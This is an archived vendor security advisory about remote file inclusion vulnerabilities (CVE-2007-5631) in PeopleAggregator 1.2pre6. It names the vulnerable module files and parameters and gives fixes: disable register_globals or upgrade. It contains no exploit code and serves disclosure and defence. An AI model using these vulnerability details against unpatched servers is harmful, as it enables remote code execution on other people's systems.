AOH :: HP Unsorted P :: TB13369.HTM

PeopleAggregatory security advisory - re CVE-2007-5631
PeopleAggregatory security advisory - re CVE-2007-5631
PeopleAggregatory security advisory - re CVE-2007-5631

Hi all,

This is a notification that the remote file inclusion vulnerabilities reported
in CVE-2007-5631 have been fixed in PeopleAggregator v1.2pre6-release-55, and
are not exploitable if PHP's register_globals directive is disabled.

CVE entry:

Multiple PHP remote file inclusion vulnerabilities in PeopleAggregator 1.2pre6
allow remote attackers to execute arbitrary PHP code via a URL in the
current_blockmodule_path parameter to (1)
AudiosMediaGalleryModule/AudiosMediaGalleryModule.php, (2)
ImagesMediaGalleryModule/ImagesMediaGalleryModule.php, (3)
MembersFacewallModule/MembersFacewallModule.php, (4)
NewestGroupsModule/NewestGroupsModule.php, (5)
UploadMediaModule/UploadMediaModule.php, and (6)
VideosMediaGalleryModule/VideosMediaGalleryModule.php in BetaBlockModules/; and
(7) the path_prefix parameter to several components.

Notes from vendor: To be exploitable, the web server must be configured with
PHP's register_globals directive ON.  To fix a vulnerable installation, either
turn register_globals OFF in php.ini or via the php_flag Apache option, or
upgrade to v1.2pre6-release-55.

Advisory blog post:

Upgrade instructions:

- If installed via Subversion, 'svn update' in the root of your PeopleAggregator

- If installed via tarball, download the latest tarball from
55.tar.gz and copy all files over those from your existing installation.

Phillip Pearson
Broadband Mechanics

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH
We do not send spam. If you have received spam bearing an email address, please forward it with full headers to